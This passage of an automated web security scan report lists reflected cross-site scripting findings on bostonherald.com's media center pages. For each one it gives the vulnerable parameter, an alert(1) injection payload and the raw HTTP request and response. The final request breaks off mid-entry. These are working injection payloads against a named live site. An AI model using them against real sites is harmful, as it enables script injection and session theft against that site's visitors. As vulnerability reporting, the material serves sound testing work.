2.9. http://bostonherald.com/mediacenter/index.php [media_type_photo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The value of the media_type_photo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ebf"><script>alert(1)</script>22ef8972f94 was submitted in the media_type_photo parameter. This input was echoed as 99ebf\"><script>alert(1)</script>22ef8972f94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/index.php?media_type_photo=099ebf"><script>alert(1)</script>22ef8972f94&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 323126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<input type="checkbox" id="media_type_photo" name="media_type_photo" value="099ebf\"><script>alert(1)</script>22ef8972f94" checked="checked" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" />
...[SNIP]...

2.10. http://bostonherald.com/mediacenter/index.php [media_type_video parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The value of the media_type_video request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65fe9"><script>alert(1)</script>f95937acf11 was submitted in the media_type_video parameter. This input was echoed as 65fe9\"><script>alert(1)</script>f95937acf11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=165fe9"><script>alert(1)</script>f95937acf11&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:42:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 247968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<input type="checkbox" id="media_type_video" name="media_type_video" value="165fe9\"><script>alert(1)</script>f95937acf11" checked="checked" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" />
...[SNIP]...

2.11. http://bostonherald.com/mediacenter/index.php [media_type_video parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The value of the media_type_video request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa289'-alert(1)-'1f9055edff8 was submitted in the media_type_video parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=1aa289'-alert(1)-'1f9055edff8&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:42:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 323055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;

            // Converts the GET params to a JSON object
               mcParams = 'media_type_photo=0&media_type_video=1aa289'-alert(1)-'1f9055edff8&media_type_audio=0'.toQueryParams();

               //alert(Object.inspect(mcParams));

               function updateData(key,val) {

                   // update paramaters JSON
                   mcParams[key] = val;


...[SNIP]...

2.12. http://bostonherald.com/mediacenter/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7504e'-alert(1)-'d79ac0d1774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/index.php?7504e'-alert(1)-'d79ac0d1774=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 10:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 442500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;

            // Converts the GET params to a JSON object
               mcParams = '7504e'-alert(1)-'d79ac0d1774=1'.toQueryParams();

               //alert(Object.inspect(mcParams));

               function updateData(key,val) {

                   // update paramaters JSON
                   mcParams[key] = val;

                   // Show loadi
...[SNIP]...

2.13. http://bostonherald.com/mediacenter/video.php [height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 441c5"><script>alert(1)</script>37ebb88cd1f was submitted in the height parameter. This input was echoed as 441c5\"><script>alert(1)</script>37ebb88cd1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275441c5"><script>alert(1)</script>37ebb88cd1f HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2676
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="adCompanionSubstitute" class="w320xh275441c5\"><script>alert(1)</script>37ebb88cd1f">
...[SNIP]...

2.14. http://bostonherald.com/mediacenter/video.php [media_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the media_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d872e</script><script>alert(1)</script>7390949a1e1 was submitted in the media_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697d872e</script><script>alert(1)</script>7390949a1e1&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2682
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
);

    tmObj.set("VideoURL", "http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20101106%2F110610weddingmg.flv&video_id=1697d872e</script><script>alert(1)</script>7390949a1e1");
tmObj.set("VideoTitle", "Wedding limo highjacking");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_ima
...[SNIP]...

2.15. http://bostonherald.com/mediacenter/video.php [program_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef7e8"><script>alert(1)</script>d6ee082395 was submitted in the program_id parameter. This input was echoed as ef7e8\"><script>alert(1)</script>d6ee082395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269ef7e8"><script>alert(1)</script>d6ee082395&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2718
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269ef7e8\"><script>alert(1)</script>d6ee082395_p.js">
...[SNIP]...

2.16. http://bostonherald.com/mediacenter/video.php [program_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7cc8</script><script>alert(1)</script>1deba88b8c was submitted in the program_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269e7cc8</script><script>alert(1)</script>1deba88b8c&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2730
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
tonherald.com/video/20101106/110610weddingmg.flv.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv.jpg");


           tmObj.start('4c6ebfbed6269e7cc8</script><script>alert(1)</script>1deba88b8c'); // Set in Acudeo Console

           // 49ee2ce0476b3 -- incl bottom companion ad
</script>
...[SNIP]...

2.17. http://bostonherald.com/mediacenter/video.php [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26471</script><script>alert(1)</script>312f5f181e0 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv26471</script><script>alert(1)</script>312f5f181e0&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2802
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
age
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg

           tmObj.set("PreviewImageURL","http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv26471</script><script>alert(1)</script>312f5f181e0.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv26471</script>
...[SNIP]...

2.18. http://bostonherald.com/mediacenter/video.php [title parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1225e</script><script>alert(1)</script>a62b7470be2 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking1225e</script><script>alert(1)</script>a62b7470be2&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2682
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
d.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20101106%2F110610weddingmg.flv&video_id=1697");
tmObj.set("VideoTitle", "Wedding limo highjacking1225e</script><script>alert(1)</script>a62b7470be2");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg

           tmObj.set("PreviewImageURL","
...[SNIP]...

2.19. http://bostonherald.com/mediacenter/video.php [width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4376"><script>alert(1)</script>4dba9d01cd was submitted in the width parameter. This input was echoed as f4376\"><script>alert(1)</script>4dba9d01cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320f4376"><script>alert(1)</script>4dba9d01cd&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
